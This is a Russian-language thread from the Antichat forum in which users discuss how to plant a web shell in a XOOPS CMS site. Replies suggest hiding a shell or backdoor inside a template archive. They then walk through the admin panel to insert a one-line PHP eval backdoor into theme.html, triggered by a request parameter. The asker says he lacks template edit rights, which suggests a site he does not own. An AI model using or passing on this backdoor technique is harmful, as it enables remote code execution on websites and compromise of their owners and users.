ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |

31.12.2011, 14:07
|
|
Guest
Провел на форуме: 18455
|
|
Как можно залить шелл в xoops? Думаю единственная возможность через заливку шаблона.
Скачал шаблон для xoops, распаковал zip архив и через тотал командер упаковал в tar, но при заливке шаблона выдает ошибку что то типа отсутствует страуктура или типо того. Подскажите как можно залить шелл?
|
|
|
|

01.01.2012, 13:11
|
|
Guest
Провел на форуме: 102354
|
|
Сообщение от flinster
flinster said:
Как можно залить шелл в xoops? Думаю единственная возможность через заливку шаблона.
Скачал шаблон для xoops, распаковал zip архив и через тотал командер упаковал в tar, но при заливке шаблона выдает ошибку что то типа отсутствует страуктура или типо того. Подскажите как можно залить шелл?
Просто открой WinRar-ом шаблон, перекинь шелл в окно WinRar и залей. Можешь еще дописать любой файл из архива, оставив в нем бэкдор.
|
|
|
|

02.01.2012, 20:04
|
|
Guest
|
|
Сообщение от Ereee
Ereee said:
Просто открой WinRar-ом шаблон, перекинь шелл в окно WinRar и залей. Можешь еще дописать любой файл из архива, оставив в нем бэкдор.
так и хочу сделать, но видимо вы не в курсе что можно закидывать архивы tar другие не канают
|
|
|
|

02.01.2012, 22:34
|
|
Guest
Провел на форуме: 102354
|
|
Вообщем затея такая:
Идем в админку -> Модули -> Система -> Шаблоны -> Выбираем текущий шаблон -> theme.html.
В него можно вставить php-код между тегами echo "php";
Сейчас дальше соображу. Так как после вставки кода, у меня отказывает отображатся сайт.
--
UPD. Просто шаблон был кривой. Поставил другой шаблон, все нормально выполняется. Т.е. вставляешь в шаблон:
if (isset($_REQUEST['e'])) eval(stripslashes($_REQUEST['e']));
Вызываешь http://site.ltd/index.php?e=phpinfo();
Дальше все понятно. Кстати, не нашел где ты пытаешься залить .tar архив. Я движок скачал с сайта xoops2.ru, он?
|
|
|
|

03.01.2012, 01:54
|
|
Guest
|
|
Сообщение от None
Кстати, не нашел где ты пытаешься залить .tar архив. Я движок скачал с сайта xoops2.ru, он?
все верно он самый. В установке шаблона есть возможность закачать, установить шаблон, просто если поменять расширение zip архива на tar то закачивает удачно но не устанавливается.
Сообщение от None
Вообщем затея такая:
Идем в админку -> Модули -> Система -> Шаблоны -> Выбираем текущий шаблон -> theme.html.
В него можно вставить php-код между тегами echo "php";
Сейчас дальше соображу. Так как после вставки кода, у меня отказывает отображатся сайт.
спасибо большое хорошая затея, но мне к сожалению не покатит, нет прав на правку шаблона
Сообщение от None
Файл должен иметь расширение tar.gz или .tar и принятую XOOPS структуру набора шаблонов
|
|
|
|
|
 |
|